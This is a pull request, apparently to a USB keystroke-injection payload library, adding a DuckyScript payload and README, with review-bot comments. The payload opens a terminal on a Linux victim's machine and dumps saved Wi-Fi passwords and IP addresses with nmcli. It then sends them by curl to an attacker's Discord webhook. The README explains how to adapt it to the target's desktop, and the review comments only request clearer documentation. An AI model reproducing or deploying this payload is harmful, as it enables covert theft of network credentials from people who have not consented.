New payload exfiltrate linux wifi credentials #236

Open: wants to merge 4 commits into base: master
35 changes: 35 additions & 0 deletions payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md
@@ -0,0 +1,35 @@
# Exfiltrate wifi creds of a linux system to a discord webhook

This payload grabs the wifi credentials on a linux system and sens it to you with a discord webhook.

## Getting started

### Dependencies
- Linux
- Bash
- Network Manager

### Prerequisites

If your target uses Gnome, uncomment this line in the payload (uncomment by removing `REM_BLOCK` and `END_REM`:
```
REM_BLOCK
Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
ALT F2
DELAY 200
STRINGLN xterm
DELAY 500
END_REM
```

If your target uses a DE or WM that lets you open a terminal with ctrl-alt-t uncomment this line:
```
REM_BLOCK
Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
CTRL-ALT t
DELAY 500
END_REM
```

## Settings
- #dc your discord webhook
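
Review bot: The README does not describe everything payload.txt sends or needs. The command typed by the payload also runs `nmcli | grep "inet4\|inet6"`, so interface address lines leave the host along with the Wi-Fi password, and it calls `jq` and `curl`, neither of which appears under Dependencies; please document both. Smaller points in the same file: "sens it" should read "sends it", the parenthesis opened at "(uncomment by removing" is never closed, and the Gnome snippet shows `STRINGLN xterm` while payload.txt has `STRINGLN xterm -fa monaco -fs 1`.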
42 changes: 42 additions & 0 deletions payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
@@ -0,0 +1,42 @@
REM_BLOCK
###############################################
# |
# Title : Get Linux wifi credentials |
# Author : simen64 |
# Version : 1.0 |
# Category : Exfiltration |
# Target : Linux |
# |
###############################################
END_REM

REM change to your keyboard layout
DUCKY_LANG NO

REM put your discord webhook here
DEFINE #dc webhook here

DELAY 2000
CAPSLOCK_DISABLE
DEFAULT_DELAY 10

REM_BLOCK
Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
ALT F2
DELAY 200
STRINGLN xterm -fa monaco -fs 1
DELAY 500
END_REM

REM_BLOCK
Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
CTRL-ALT t
DELAY 500
END_REM

STRING output=$(nmcli dev wifi show-password && nmcli | grep "inet4\|inet6" | grep -v "127.0.0.1\|::1" | sed 's/
CTRL v
TAB
STRINGLN //')
STRINGLN escaped_output=$(printf '%s' "$output" | jq -sRr @json)
STRINGLN curl -H "Content-Type: application/json" -d "{\"username\": \"Wifi grabber\", \"content\": $escaped_output}" "#dc" && exit
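
Review bot: The `sed` expression is split across `STRING ... sed 's/`, `CTRL v`, `TAB` and `STRINGLN //')` with no REM explaining why, which makes the payload hard to audit. It appears to type a literal tab so that `sed` strips the leading tab from the matched `nmcli` lines; add a REM line above the sequence saying so. The header block also gives the title as "Get Linux wifi credentials" although the same line collects the inet4/inet6 address lines, so the title or a REM should state the full set of data that is posted to the `#dc` webhook.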